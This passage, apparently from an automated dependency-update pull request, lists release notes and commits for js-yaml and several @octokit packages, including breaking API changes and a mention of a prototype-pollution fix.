\u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support 